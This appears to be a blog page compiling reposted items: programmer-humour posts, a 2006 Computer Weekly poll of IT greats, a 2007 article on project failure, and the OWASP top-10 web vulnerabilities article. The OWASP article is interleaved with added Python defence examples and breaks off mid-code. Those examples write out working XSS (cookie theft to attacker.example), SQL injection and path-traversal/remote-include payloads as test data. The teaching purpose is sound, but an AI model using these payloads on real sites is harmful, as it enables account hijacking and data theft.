
Do developers only work in a team environment?

Killer place to work

Everyone wants the best place to work: one that offers more fun and better facilities, and with them productivity, loyalty and regularity.

Google was named the No. 1 Best Place to Work For in 2007.

Life at Google

100 Best Companies to Work For 2007



Fun with Computer’s Life

Fun with Programmer’s Life

Do you know the effects of excessive attachment to the computer or the mouse?

The results are sometimes fun, and sometimes not as pleasant as in the video... :-D

Life of a Programmer


  • How does an irritated programmer behave towards the system?
  • Do you also behave like that when you cannot pull yourself away from such a disturbing problem?


Please don’t do that to your home PC


A Day in the life of a Programmer

Programmers know their daily activities:

  • How to tackle problems
  • How to overcome the frustration of the intricate problems that come up in daily programming

(-: See whether your day has ever passed like the guy in the VIDEO :-)




IT greats: Top 10 greatest IT people


Author: Computer Weekly reporter

Posted: 00:00 27 Oct 2006

For every world-famous name with a world famous fortune, such as Bill Gates, Steve Jobs and Michael Dell, there are hundreds of other individuals who have moved the IT industry and its technology inexorably forward.

Fame and fortune has rarely been their immediate spur. A passion for changing the world through technology is the hallmark of the IT Greats. Sometimes they have changed technology, sometimes they have transformed the way technology is marketed or radically altered the way IT is perceived by society.

Some have been involved in great leaps forward, some have made incremental changes that have stood the test of time.

Whatever the case, our industry is truly one where we all stand on the shoulders of giants, and we are proud to pay tribute to some of them in the results of our IT Greats poll.

Top 10 greatest IT people
1. Steve Jobs

2. Tim Berners-Lee

3. Bill Gates

4. James Gosling

5. Linus Torvalds

6. Richard Stallman

7. Arthur C Clarke

8. Ted Codd

9. Steve Shirley

10. Martha Lane Fox

1. Steve Jobs: innovator who enjoyed a second bite of the apple

Steve Jobs, the co-founder and chief executive of Apple Computer, topped the Computer Weekly 40th anniversary poll due to the devoted following he has generated through his pioneering work in personal computing and product design.

Jobs was born in 1955 in San Francisco, and during his high school years he showed his early enthusiasm for computing by attending after-school lectures at the Hewlett-Packard Company in Palo Alto, California. He met fellow Apple founder Steve Wozniak during a summer job at HP.

In the autumn of 1974, Jobs, who had dropped out of university after one term, began attending meetings of the Homebrew Computer Club with Steve Wozniak. He took a job as a technician at Atari, a manufacturer of popular video games.

At the age of 21 Jobs saw a computer that Wozniak had designed for his own use and convinced his friend to market the product.

Apple Computer was founded as a partnership on 1 April 1976. Though the initial plan was to sell just printed circuit boards, Jobs and Wozniak ended up creating a batch of completely assembled computers, and entered the personal computer business.

Their second machine, the Apple II, was introduced the following year and became a huge success, turning Apple into an important player in the nascent personal computer industry.

In 1983 Apple launched the Lisa, the first PC with a graphical user interface – an essential element in making computing accessible to the masses. It flopped because of its prohibitive price, but the next year Apple launched the distinct, lower priced Macintosh and it became the first commercially successful GUI machine.

Despite his success in founding Apple, Jobs left following a boardroom row in 1985. But his influence on the computer industry did not end there.

Jobs moved on to found Next Computer, and in 1986 he bought the little-known Graphics Group from Lucasfilm; renamed Pixar, it achieved global dominance in animated feature films during the 1990s.

Much of Next’s technology had limited commercial success, but it laid the foundation for future computing developments. The company pioneered the object-oriented software development system, Ethernet port connectivity and collaborative software. It was the Next interface builder that allowed Tim Berners-Lee to develop the original world-wide web system at Cern.

Without Jobs, Apple had stumbled. Market share fell while it struggled to release new operating systems. Its answer was to buy Jobs’ company Next, together with its innovative operating system, and welcome back its charismatic former CEO.

On returning to Apple, Jobs drove the company ever deeper into the consumer electronics and computing market, launching the iMac and iPod.

Whether Jobs’ next creation changes the world like the Apple II, or turns out to bomb like the Apple Lisa, his place in computing history is guaranteed.

2. Tim Berners-Lee: father of the web and champion of IT freedom

Dotcoms, bloggers and Google all have one man to thank for their place in the 21st century world. In 1990, Tim Berners-Lee made the imaginative leap to combine the internet with the hypertext concept, and the worldwide web was born.

Born in 1955 in London, Berners-Lee’s parents were both mathematicians who were employed together on the team that built the Manchester Mark I, one of the earliest computers.

After attending school in London, Berners-Lee went on to study physics at Queen’s College, Oxford, where he built a computer with a soldering iron, TTL gates, an M6800 processor and an old television. While at Oxford, he was caught hacking with a friend and was subsequently banned from using the university computer.

He worked at Plessey Telecommunications from 1976 as a programmer and in 1980 began working as an independent contractor at the European nuclear research centre Cern.

In December 1980, Berners-Lee proposed a project based on the concept of hypertext, to facilitate sharing and updating information among researchers. While there, he built a prototype system called Enquire.

He joined Cern on a full-time basis in 1984 as a fellow. In 1989, Cern was the largest internet node in Europe, and Berners-Lee saw an opportunity. “I just had to take the hypertext idea and connect it to the TCP and DNS ideas,” he said, and the worldwide web was born.

He wrote his initial proposal in March of 1989, and in 1990, with the help of Robert Cailliau, produced a revision which was accepted by his manager, Mike Sendall.

He used similar ideas to those underlying the Enquire system to create the worldwide web, for which he designed and built the first web browser and editor (called WorldWideWeb and developed on Nextstep) and the first web server, the Hypertext Transfer Protocol Daemon (HTTPD).

The first website built was at http://info.cern.ch/ and was put online on 6 August 1991. The URL is still in use today. It provided an explanation of the worldwide web, how one could own a browser and how to set up a web server. It was also the world’s first web directory, since Berners-Lee maintained a list of other websites.

In 1994, Berners-Lee founded the World Wide Web Consortium (W3C) at the Massachusetts Institute of Technology. It comprised various companies willing to create standards and recommendations to improve the quality of the web.

Berners-Lee made his ideas available freely, with no patent and no royalties due. He is now the director of W3C, a senior researcher at MIT’s CSail, and professor of computer science at Southampton University.

3. Bill Gates: mixing maths and money to build Microsoft

As joint founder of the world’s biggest software company, Microsoft, Bill Gates’s approach to technology and business was instrumental in making technology available to the masses.

Gates was born in Seattle, Washington in 1955 to a wealthy family: his father was a prominent lawyer and his mother served on the board of directors for First Interstate Bank and The United Way.

At school Gates excelled in mathematics and the sciences and by the age of 13 he was deeply engrossed in software programming.

With other school mates he began programming and bug fixing for the Computer Center Corporation, and in 1970 Gates formed a venture with fellow school student and Microsoft co-founder, Paul Allen, called Traf-O-Data, to make traffic counters using the Intel 8008 processor.

In 1973, Gates enrolled at Harvard University, where he met future business partner Steve Ballmer. Gates and Allen's first venture was to develop a version of the Basic programming language for the Altair 8800, one of the first microcomputers.

Soon afterwards Gates left Harvard to found “Micro-Soft”, which later became Microsoft Corporation, with Allen. Microsoft took off when Gates began licensing his MS-Dos operating systems to manufacturers of IBM PC clones. Its drive to global dominance continued with the development of Windows, its version of the graphical user interface, as an addition to its Dos command line.

By the early 1990s, Windows had driven other Dos-based GUIs like Gem and Geos out of the market. It performed a similar feat with the Office productivity suite.

Gates fought hard to establish Micro­soft’s dominant position in the software industry and has fought even harder to defend it. His ability to get Microsoft software pre-installed on most PCs shipped in the world made Microsoft the world’s largest software house and Gates one of the world’s richest men. It also meant Microsoft found itself on the wrong end of anti-trust legislation in both the US and Europe.

Gates stood down as chief executive of Microsoft in 2000 to focus on software development and on 16 June 2006, he announced that he would move to a part-time role with Microsoft in 2008 to focus on his philanthropic work.

Since 2000, Gates has given away about £15.5bn, a third of his wealth, to charity. Such is his fame in the world outside computing, fictional Gates characters have appeared in cartoons including the Simpsons, South Park and Family Guy.

4. James Gosling

Of your choices for the most influential people in IT, James Gosling is the true geek. Unlike Bill Gates and Steve Jobs, neither of whom finished college, Gosling completed a PhD in computer science and contributed to software innovation at a technical level.

Born in 1955 near Calgary, Canada, Gosling is best known as the father of the Java programming language, the first programming language designed with the internet in mind and able to adapt to highly distributed applications.

Gosling received a BSc in computer science from the University of Calgary in 1977, and while working towards his doctorate he created the original version of the Emacs text editor for Unix (Gosmacs). He also built a multi-processor version of Unix, as well as several compilers and mail systems before starting work in the industry.

In 1984, Gosling joined Sun Microsystems, where he is currently chief technology officer in the developer product group.

In the early 1990s, Gosling initiated and led a project code-named Green that eventually became Java. Green aimed to develop software that would run on a variety of computing devices without having to be customised for each one.

Although much of the technology developed as part of Green never saw the light of day, Gosling realised that some of the underlying principles they had created would be very useful in the internet age.

Sun formally launched Java in 1995. Gosling did the original design of Java and implemented its original compiler and virtual machine. For this achievement he was elected to the US National Academy of Engineering. He has also made major contributions to several other software systems, such as NeWS and Gosling Emacs.

Although some critics say Java has not lived up to its initial "write-once-run-anywhere" claim, Gosling's success in the Computer Weekly poll is precisely because Java has allowed the creation of robust, reusable code which runs on devices as diverse as mobile phones, PCs and mainframes.

5. Linus Torvalds

As the creator of the Linux operating system, Linus Torvalds has been a driving force behind the whole open source movement, which represents not only an ever increasing challenge to proprietary software, but is also the inspiration for the industry to move to open standards.

Torvalds remains the ultimate authority on what new code is incorporated into the Linux kernel.

6. Richard Stallman

Richard Stallman is the founder of the GNU Project, an initiative to develop a complete Unix-like operating system which is free software. Stallman has written several popular tools, created the GNU licence and campaigns against software patents.

7. Arthur C Clarke

2001: A Space Odyssey writer Arthur C Clarke has consistently been ahead of his time in predicting how technology will change the world. Most notably, in 1945 he suggested that geostationary satellites would make ideal telecoms relays.

8. Ted Codd

Ted Codd created 12 rules on which every relational database is built - an essential ingredient for building business computer systems.

9. Steve Shirley

Steve Shirley was an early champion of women in IT. She founded the company now known as Xansa, pioneered new work practices and in doing so created new opportunities for women in technology.

10. Martha Lane Fox

With Brent Hoberman, Martha Lane Fox created Lastminute.com in 1998, and as "the face" of Lastminute raised the profile of e-commerce ever higher in the public consciousness.

Readers hail Dilbert the guru of corporate culture

According to Computer Weekly readers, Dilbert, which features every week on the back pages of the magazine, has more insight into corporate life and organisation than any number of highly paid management consultants could ever achieve.

Written and drawn by Scott Adams, Dilbert portrays corporate culture as a world of bureaucracy for its own sake, where employees' skills and efforts are not rewarded. Much of the humour emerges from the characters wrestling with the obviously ridiculous decisions and behaviour of management.

1955: a good year for computing

The top four people in our poll were all born in 1955, making it a very beneficial year for the world of computing.

It may have been a good year for computing, but 1955 was a sad year for science, as Albert Einstein died on 18 April.

It was also the year that the first McDonald's fast food franchise was opened: we'll leave you to make up you own mind about that one.

Your big names

Outside the main choices in the poll, the most popular readers' suggestions were:

1. Ken Olsen, founder of DEC, who invented the minicomputer

2. Clive Sinclair, home computer visionary

3. Vint Cerf, one of the internet's founding fathers

4. Bill Joy, co-founder of Sun Microsystems

5. Larry Ellison, founder of Oracle

6. Steve Wozniak, Apple co-founder

7. Dennis Ritchie, inventor of the C programming language

8. Donald Davies, co-inventor of packet switching

9. Ken Thompson, co-creator of Unix

10. Grace Hopper, Cobol pioneer

10 Warning Signs of Project Failure

By Allen Bernard
October 18, 2007

Unless you are in a mature industry such as banking or insurance, where information is the life-blood of what you do, chances are you will be familiar with at least some of these 10 project management failings put together by Robert Francis Group analyst Mimi Ho.

"One, they're right on the button and two, if you take a look at the large majority of them, it all has to do with project planning and early stages of analysis that companies like to jump over," said Jeff Monteforte, owner of Exential, an independent project management consultancy in Cleveland, Ohio.

In other words, when IT projects fail it rarely is a result of the technology. At its core, project management is all about people.

"Even in some of our clients, some of them are doing very well … and others are just starting where they don't even have executive support and they get the executives saying 'Just start the project I don't care what you do'," said Ms. Ho. "And projects fail … and they're like 'It's IT's fault.'"

The Top 3 problems Monteforte, a 20-year veteran of the project management business, encounters most often are: lack of executive support; changes to project scope and the lack of change management; and failure to establish user expectations which leads all too often to unrealistic deadlines.

The Top 3 project killers he encounters are: lack of executive support; lack of pre-project planning; and insufficient people (not monetary) resources allocated to get the project done.

Ms. Ho also sees the same problems—especially lack of executive support—as Monteforte but adds poorly defined project requirements to his lists.

"You need to speak with stakeholders directly because the bill changes or they visualize the project being a certain way but when it's communicated the project could be different," said Ms. Ho.

According to RFG and Ms. Ho, what follows, in no particular order, are the 10 most common pitfalls to successful project completion:

Undefined or poorly defined project requirements. - Project managers should collaborate directly with key project stakeholders to define specific detailed project requirements and deliverables. Defining specific project requirements is necessary to maintain alignment of project tasks to desired business outputs, as well as to ensure that projects have clear and specific project objectives established.

While this step may seem obvious, many companies will skip this stage and go right to solutions to jump start a project. Business and/or IT executives assume the requirements (such as controls, dashboards, data, dependencies, functionality, integration, metrics, outputs, and workflow) are met without performing any confirming analysis.

These projects tend to fail and the companies usually encounter over spending, project restarts, rework, and/or unmet expectations.

Lack of project planning. - Once the requirements are known, then conducting thorough, upfront project scope planning is an essential next step to help project managers and stakeholders accurately and clearly define project scope.

It is important for people to understand that there is more than one way to achieve the requirements and that scope and cost vary by approach. Project scope management is therefore necessary to develop reasonable project estimates, enhance the management of customer and stakeholder expectations, and mitigate project risks such as cost overruns and schedule delays.

Project managers should establish and standardize a scope management process to develop concise project scope statements and credible budget and schedule estimates.

Lack of or poorly developed budget forecast. - Thorough research and preparation is necessary to develop a reasonable budget estimate. Many companies will skip this step or just do a very rudimentary estimate due to the amount of work needed to complete the task.

Some companies that do not maintain internal archives of project costs turn to external consultancies to acquire external spending/budget information on companies that have completed similar projects in a similar market.

Using the estimated budget, project managers should collaborate with stakeholders to help further refine the project scope and final deliverables. Project managers should use their initial budget to base actual spending plans as well as to proactively track spending and respond quickly to potential issues to prevent shortfalls in the budget.

Lack of stakeholder involvement. - Project managers should ensure that primary project stakeholders are involved with the project from the beginning and throughout the entire project. This is crucial to ensure that visions are properly communicated, defined, and verified.

It is very common for project efforts to be delegated to staff that do not have sufficient knowledge or understanding of the desired effort. As a result, projects are defined incorrectly and the projects delivered do not meet the expectations of key stakeholders.

Lack of executive support. - An IT project can be highly political and may end up involving an excessive number of unnecessary or incorrect participants. IT executives should seek ongoing senior management endorsement and enforcement of the planning process to keep the effort on track and to minimize pushback from line of business (LOB) managers.

Support from senior management and staff involvement are both needed to drive and keep the effort focused and moving. Ownership of the project must be shared to satisfy the demands of user management. IT executives must convey this message to senior management to retain involvement and participation.

Frequent or large changes to project scope. - Scope changes can significantly impact the cost, schedule, risks and quality of the entire effort. Project managers should watch out for early and frequent changes to the project scope.

While scope is defined early in the planning and estimation phases, there are valid reasons for change. For example, a stakeholder may acquire additional insight into a problem during the course of the project or external market conditions and/or government regulations can drive requests that extend beyond the initial project scope. However, changes to project scope can also occur as a result of developing a poor initial scope document.

Project managers must ensure that adequate time is spent on defining and refining the work effort directly with key stakeholders.

Lack of change management process. - Project changes will occur. However, uncontrolled changes and insufficient change management processes will increase the probability of project failure. A formal and structured change management process is necessary to ensure effects of any changed requirements are properly analyzed, prioritized, and balanced according to the project's budget, schedule, and scope.

Project managers should consistently and publicly take a phased approach to projects, so that users understand that not all changes must be completed for the current release. This will help acceptance of trading off specific desired changes for faster availability of greater functionality. This will also help reduce the impact of change onto the project, and allow for cost and time containment.

Failure to establish appropriate client/user expectations. - Disputes often occur as a result of mismatched expectations. Missed project targets will cause delays, rework, and additional project spending. Setting user expectations is necessary to establish a baseline of what and what not to expect from the final deliverable.

Project managers should work with key stakeholders in establishing and prioritizing project requirements as well as reviewing budgets and schedules. Additionally, all people involved in the project effort should have periodic joint sessions, to ensure the same communications on project expectations are received by everyone.

This process helps keep users involved and abreast of the project's status, as well as minimizing the potential for misunderstanding of project expectations between stakeholders.

Unrealistic deadlines. - Stakeholders want their projects completed now. In some harsh environments, they may question IT's commitment and effort. IT executives and project managers must work with stakeholders to help them understand what is possible with the level of incumbent IT resources.

Project managers should collaborate with key stakeholders in defining reasonable project schedules and deadlines to ensure that business conditions and requirements are met and better manage expectation levels.

Project managers will need to ensure that project cost, scope, and time are optimally balanced to achieve the desired deliverables and the desired time. Effective planning and monitoring are necessary to help develop a strong start for the project. However, project managers must remain aware and anticipate change as re-planning is necessary throughout the project.

Insufficient resources. - Required resources are often underestimated and scheduled inaccurately. Companies often encounter problems with resource allocation, as many do not spend sufficient time on resource scheduling and proper management.

In fact, it is very common for companies to overestimate the on-boarding of staff to a project, which immediately causes the project to be late and in trouble, impairing IT's image with LOB managers and executives. In addition, resources are often utilized ineffectively, especially when individuals are required to support multiple projects concurrently. Insufficient resource supply will cause delays and impact overlapping projects.

Project managers should plan according to the established project schedule estimates and work with concurrent project schedules to help ensure that resources are properly scheduled.

Summary

All companies have experienced projects that have gone over budget, schedule, and scope. However, project managers can learn from past historical data, experiences of peer companies, and project management organizations.

Taking a proactive approach to preventing project failure is a necessary first step to overcoming repeated failure. Sufficient research and planning as well as patience in establishing necessary project processes are essential to developing a solid project management foundation.

Project managers must ensure that the initial project plan is strong enough to sustain the project throughout its life cycle. A project plan should be assessed on the project's alignment with business strategies, budget, the cost/benefit analysis, relevance, resource requirements, and scope to help determine its value contribution to the enterprise.


The top 10 reasons Web sites get hacked

Experts say the people who actually build Web applications aren't paying much attention to security; a non-profit group is trying to solve that

By Jon Brodkin, Network World
October 05, 2007

Web security is at the top of customers' minds after many well-publicized personal data breaches, but the people who actually build Web applications aren't paying much attention to security, experts say.

"They're totally ignoring it," says IT consultant Joel Snyder. "When you go to your Web site design team, what you're looking for is people who are creative and able to build these interesting Web sites... That's No. 1, and No. 9 on the list would be that it's a secure Web site."

The biggest problem is designers aren't building walls within Web applications to partition and validate data moving between parts of the system, he says.

Security is usually something that's considered after a site is built rather than before it is designed, agrees Khalid Kark, senior analyst at Forrester.

"I'd say the majority of Web sites are hackable," Kark says. "The crux of the problem is security isn't thought of at the time of creating the application."

That's a big problem, and it's one the nonprofit Open Web Application Security Project (OWASP) is trying to solve. An OWASP report called "The Ten Most Critical Web Application Security Vulnerabilities" was issued this year to raise awareness about the biggest security challenges facing Web developers.

The first version of the list was released in 2004, but OWASP Chairman Jeff Williams says Web security has barely improved. New technologies such as AJAX and Rich Internet Applications that make Web sites look better also create more attack surfaces, he says. Convincing businesses their Web sites are insecure is no easy task, though.

"It's frustrating to me, because these flaws are so easy to find and so easy to exploit," says Williams, who is also CEO and co-founder of Aspect Security. "It's like missing a wall on a house."

Here is a summary of OWASP's top 10 Web vulnerabilities, including a description of each problem, real-world examples and how to fix the flaws.

1. Cross site scripting (XSS)

The problem: The "most prevalent and pernicious" Web application security vulnerability, XSS flaws happen when an application sends user data to a Web browser without first validating or encoding the content. This lets hackers execute malicious scripts in a browser, letting them hijack user sessions, deface Web sites, insert hostile content and conduct phishing and malware attacks.

Attacks are usually executed with JavaScript, letting hackers manipulate any aspect of a page. In a worst-case scenario, a hacker could steal information and impersonate a user on a bank's Web site, according to Snyder.

Real-world example: PayPal was targeted last year when attackers redirected PayPal visitors to a page warning users their accounts had been compromised. Victims were redirected to a phishing site and prompted to enter PayPal login information, Social Security numbers and credit card details. PayPal said it closed the vulnerability in June 2006.

How to protect users: Use a whitelist to validate all incoming data, which rejects any data that's not specified on the whitelist as being good. This approach is the opposite of blacklisting, which rejects only inputs known to be bad.

Additionally, use appropriate encoding of all output data. "Validation allows the detection of attacks, and encoding prevents any successful script injection from running in the browser," OWASP says.
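The two layers OWASP describes, whitelist validation on the way in and encoding on the way out, side by side with the flaw they fix. This is an added example, not code from the article or from OWASP; the display-name whitelist pattern and the greeting page are assumptions made for the demo.

```python
import html
import re

# Whitelist for one field (a display name): letters, digits, spaces, dots,
# hyphens and apostrophes, 1 to 40 characters. Input that does not match is
# rejected outright, not "cleaned". The pattern is an assumption for this demo.
DISPLAY_NAME_RE = re.compile(r"^[A-Za-z0-9 .'\-]{1,40}$")


def validate_display_name(value: str) -> str:
    """Whitelist validation: accept only what the pattern explicitly allows."""
    if not DISPLAY_NAME_RE.fullmatch(value):
        raise ValueError("display name contains disallowed characters")
    return value


def render_greeting_vulnerable(name: str) -> str:
    """The flaw: user data is written into the page without encoding, so a
    name such as <script>...</script> becomes live markup in the browser."""
    return f"<p>Welcome back, {name}!</p>"


def render_greeting_safe(name: str) -> str:
    """Output encoding: <, >, &, \" and ' are replaced by HTML entities, so the
    browser renders the name as text even if it contains script tags."""
    return f"<p>Welcome back, {html.escape(name, quote=True)}!</p>"


def handle_profile_request(name: str) -> str:
    """Both layers together: validation detects the attack, and encoding stops
    anything that slips past validation from executing."""
    return render_greeting_safe(validate_display_name(name))


if __name__ == "__main__":
    # Constructed payload of the kind used in the PayPal-style redirect attack.
    payload = "<script>document.location='http://attacker.example/?c='+document.cookie</script>"
    print(render_greeting_vulnerable(payload))   # script tag reaches the browser intact
    print(render_greeting_safe(payload))         # rendered as harmless text
    try:
        handle_profile_request(payload)
    except ValueError as e:
        print("rejected by whitelist:", e)
    print(handle_profile_request("Ann O'Neil"))  # legitimate name with an apostrophe
```

Note that encoding is context-specific: html.escape is correct for text between tags and for attribute values, but data placed inside a script block or a URL needs the encoding of that context instead.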

2. Injection flaws

The problem: When user-supplied data is sent to interpreters as part of a command or query, hackers trick the interpreter -- which interprets text-based commands -- into executing unintended commands. "Injection flaws allow attackers to create, read, update, or delete any arbitrary data available to the application," OWASP writes. "In the worst-case scenario, these flaws allow an attacker to completely compromise the application and the underlying systems, even bypassing deeply nested firewalled environments."

Real-world example: Russian hackers broke into a Rhode Island government Web site to steal credit card data in January 2006. Hackers claimed the SQL injection attack stole 53,000 credit card numbers, while the hosting service provider claims it was only 4,113.

How to protect users: Avoid using interpreters if possible. "If you must invoke an interpreter, the key method to avoid injections is the use of safe APIs, such as strongly typed parameterized queries and object relational mapping libraries," OWASP writes.
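A worked SQL injection against a login query, and the parameterised query OWASP recommends, run against a small in-memory SQLite table. This is an added example, not code from the article; the table, the accounts and the card numbers are constructed sample data.

```python
import sqlite3


def make_demo_db() -> sqlite3.Connection:
    """Constructed sample data for this example (not from the article).
    Plaintext passwords are used only to keep the demo short."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, "
                 "password TEXT, card TEXT)")
    conn.executemany(
        "INSERT INTO users (username, password, card) VALUES (?, ?, ?)",
        [("alice", "s3cret", "4111-1111-1111-1111"),
         ("bob", "hunter2", "5500-0000-0000-0004")],
    )
    return conn


def login_vulnerable(conn, username: str, password: str) -> list:
    """The flaw: user input is pasted into the query text, so the SQL
    interpreter cannot tell data from command."""
    query = ("SELECT username, card FROM users "
             f"WHERE username = '{username}' AND password = '{password}'")
    return conn.execute(query).fetchall()


def login_safe(conn, username: str, password: str) -> list:
    """Parameterised query: the statement is fixed, values are bound
    separately, and a quote inside a value is just a character."""
    query = "SELECT username, card FROM users WHERE username = ? AND password = ?"
    return conn.execute(query, (username, password)).fetchall()


if __name__ == "__main__":
    db = make_demo_db()
    # Tautology in the password field: ... AND password = '' OR '1'='1'
    print(login_vulnerable(db, "nobody", "' OR '1'='1"))   # every row, cards included
    print(login_safe(db, "nobody", "' OR '1'='1"))         # []
    # Comment sequence in the username field: ... username = 'alice'--' AND ...
    print(login_vulnerable(db, "alice'--", "wrong"))       # alice's row, no password needed
    print(login_safe(db, "alice'--", "wrong"))             # []
    print(login_safe(db, "alice", "s3cret"))               # the one legitimate match
```

The vulnerable version leaks both customers' card numbers to a tautology in the password field, which is exactly the shape of data the Rhode Island breach above exposed; the bound-parameter version returns nothing for either payload because the quote and the comment sequence never reach the parser as syntax.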

3. Malicious file execution

The problem: Malicious file execution flaws let hackers perform remote code execution, install rootkits remotely, or completely compromise a system. Any type of Web application is vulnerable if it accepts filenames or files from users without checking them. The vulnerability may be most common with PHP, a widely used scripting language for Web development.

Real-world example: A teenage programmer discovered in 2002 that Guess.com was vulnerable to attacks that could steal more than 200,000 customer records from the Guess database, including names, credit card numbers and expiration dates. Guess agreed to upgrade its information security the next year after being investigated by the Federal Trade Commission.

How to protect users: Don't use input supplied by users in any filename for server-based resources, such as images and script inclusions. Set firewall rules to prevent new connections to external Web sites and internal systems.
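How "don't use user input in a filename" looks in code: a page-include routine that takes the filename from the request, next to one that takes only a short id and maps it to a server-side name, with a path-containment check as a second line of defence. This is an added example, not code from the article; the directory layout, the template id table and the secret file are constructed for the demo.

```python
import os
import tempfile


def build_demo_tree() -> str:
    """Constructed layout for this example (not from the article): a templates
    directory the application may read, and a secret file outside it."""
    root = tempfile.mkdtemp()
    os.mkdir(os.path.join(root, "templates"))
    with open(os.path.join(root, "templates", "welcome.html"), "w") as f:
        f.write("<h1>Welcome</h1>")
    with open(os.path.join(root, "secret.txt"), "w") as f:
        f.write("db_password=hunter2")
    return root


def include_vulnerable(root: str, name: str) -> str:
    """The flaw: a user-supplied name (e.g. ?page=...) becomes part of the path,
    so ../secret.txt walks out of the templates directory."""
    with open(os.path.join(root, "templates", name)) as f:
        return f.read()


# Indirection: the client sends a short id, never a filename. Only server-side
# names appear here, so traversal sequences and URLs cannot be injected.
TEMPLATE_IDS = {"welcome": "welcome.html"}


def contained_path(base_dir: str, relative: str) -> str:
    """Defence in depth: resolve the path and refuse anything that escapes
    base_dir (traversal, absolute paths, symlinks pointing outside)."""
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, relative))
    if os.path.commonpath([base, candidate]) != base:
        raise PermissionError(f"path escapes {base_dir}: {relative!r}")
    return candidate


def include_safe(root: str, template_id: str) -> str:
    """Look the id up; anything not in the table is refused before any path is built."""
    filename = TEMPLATE_IDS.get(template_id)
    if filename is None:
        raise PermissionError(f"unknown template id {template_id!r}")
    path = contained_path(os.path.join(root, "templates"), filename)
    with open(path) as f:
        return f.read()


if __name__ == "__main__":
    root = build_demo_tree()
    print(include_vulnerable(root, "../secret.txt"))   # leaks the secret
    print(include_safe(root, "welcome"))               # <h1>Welcome</h1>
    for bad in ("../secret.txt", "/etc/passwd", "http://attacker.example/shell.txt"):
        try:
            include_safe(root, bad)
        except PermissionError as e:
            print("refused:", e)
```

The id table does the real work; contained_path only exists so that a future mistake in the table (or a symlink dropped into the templates directory) still cannot reach outside it.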

4. Insecure direct object reference

The problem: Attackers manipulate direct object references to gain unauthorized access to other objects. It happens when URLs or form parameters contain references to objects such as files, directories, database records or keys.

Banking Web sites commonly use a customer account number as the primary key, and may expose account numbers in the Web interface.

"References to database keys are frequently exposed," OWASP writes. "An attacker can attack these parameters simply by guessing or searching for another valid key. Often, these are sequential in nature."

Real-world example: An Australian Taxation Office site was hacked in 2000 by a user who changed a tax ID present in a URL to access details on 17,000 companies. The hacker e-mailed the 17,000 businesses to notify them of the security breach.

How to protect users: Use an index, indirect reference map or another indirect method to avoid exposure of direct object references. If you can't avoid direct references, authorize Web site visitors before using them.
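The indirect reference map OWASP recommends, written out as an added Python example (not the article's or OWASP's code). The customers, account numbers and balances are constructed; the session map is built at login from the accounts the customer actually owns, and the only identifiers that reach the browser are random tokens that resolve through that map. A second function shows the fallback for when the raw key has to stay in the URL: authorize before using it.

```python
import secrets

# Constructed sample data (not from any real bank): which accounts each
# logged-in customer owns, and the balances behind the raw account numbers.
ACCOUNT_OWNERS = {
    "alice": ["100001", "100002"],
    "bob": ["100003"],
}
BALANCES = {"100001": 1500, "100002": 40, "100003": 9999}


class ReferenceMap:
    """Per-session indirect reference map. The browser only ever sees random
    tokens, and a token resolves only to an object this session was granted,
    so guessing 100002 when you hold 100001 gets nowhere."""

    def __init__(self):
        self._to_real = {}
        self._to_token = {}

    def grant(self, real_key):
        """Called only while building pages, for objects the user may see."""
        if real_key not in self._to_token:
            tok = secrets.token_urlsafe(16)
            self._to_token[real_key] = tok
            self._to_real[tok] = real_key
        return self._to_token[real_key]

    def resolve(self, token):
        try:
            return self._to_real[token]
        except KeyError:
            raise PermissionError("unknown reference") from None


def build_session_map(username):
    """Runs at login: grants exactly the accounts the customer owns."""
    ref_map = ReferenceMap()
    for acct in ACCOUNT_OWNERS.get(username, []):
        ref_map.grant(acct)
    return ref_map


def account_links(username, ref_map):
    """Links the page renders: /account?id=<token>, never the account number."""
    return ["/account?id=" + ref_map.grant(a) for a in ACCOUNT_OWNERS.get(username, [])]


def balance_view(ref_map, token):
    """Handler for /account?id=...: the token from the URL goes back through
    the session's map; anything not granted raises before data is touched."""
    return BALANCES[ref_map.resolve(token)]


def balance_direct_with_authz(username, account_number):
    """If a direct reference must stay in the URL, authorize before using it."""
    if account_number not in ACCOUNT_OWNERS.get(username, []):
        raise PermissionError("not your account")
    return BALANCES[account_number]
```

Because the map lives in the session, a token copied out of Alice's page is meaningless in Bob's session, and sequential account numbers never appear anywhere an attacker can increment them.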

5. Cross site request forgery

The problem: "Simple and devastating," this attack makes a victim's browser, while it is logged on to a Web site, send forged requests to that Web application as if the user had made them. Web sites are extremely vulnerable, partly because they tend to authorize requests based on session cookies or "remember me" functionality, which the browser attaches to every request automatically. Banks are potential targets.

"Ninety-nine percent of the applications on the Internet are susceptible to cross site request forgery," Williams says. "Has there been an actual exploit where someone's lost money? Probably the banks don't even know. To the bank, all it looks like is a legitimate transaction from a logged-in user."

Real-world example: A hacker known as Samy gained more than a million "friends" on MySpace.com with a worm in late 2005, automatically including the message "Samy is my hero" in thousands of MySpace pages. The attack itself may not have been that harmful, but it was said to demonstrate the power of combining cross site scripting with cross site request forgery. Another example that came to light one year ago exposed a Google vulnerability allowing outside sites to change a Google user's language preferences.

How to protect users: Don't rely on credentials or tokens automatically submitted by browsers. "The only solution is to use a custom token that the browser will not 'remember,'" OWASP writes.
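The custom token OWASP describes, as an added Python example (not code from the article or from OWASP). The in-memory session store, the transfer form and the request dictionaries are constructed for the demonstration. The server embeds a per-session secret in the form it serves; a page on another origin can make the browser send the cookie but cannot read that secret, so its forged POST fails the check.

```python
import hmac
import secrets

SESSIONS = {}  # session cookie value -> session state (constructed store)


def new_session(username):
    sid = secrets.token_urlsafe(32)
    SESSIONS[sid] = {"user": username, "csrf": secrets.token_urlsafe(32)}
    return sid


def render_transfer_form(sid):
    """The server embeds the session's token in the form it serves. The
    browser will not 'remember' this value, and a cross-origin page cannot
    read it, so only a form the site itself served can supply it."""
    token = SESSIONS[sid]["csrf"]
    return ('<form method="post" action="/transfer">'
            f'<input type="hidden" name="csrf" value="{token}">'
            '<input name="to"><input name="amount"></form>')


def handle_transfer(cookie_sid, form):
    """The cookie arrives automatically, so it proves nothing about who built
    the request. The token in the body must match the one tied to that
    session; compare_digest keeps the comparison constant-time."""
    session = SESSIONS.get(cookie_sid)
    if session is None:
        return 401, "not logged in"
    supplied = form.get("csrf", "")
    if not hmac.compare_digest(supplied, session["csrf"]):
        return 403, "csrf token missing or wrong"
    return 200, f"transferred {form['amount']} to {form['to']}"


if __name__ == "__main__":
    sid = new_session("alice")
    # What an attacker's page can make the browser send: cookie, no token.
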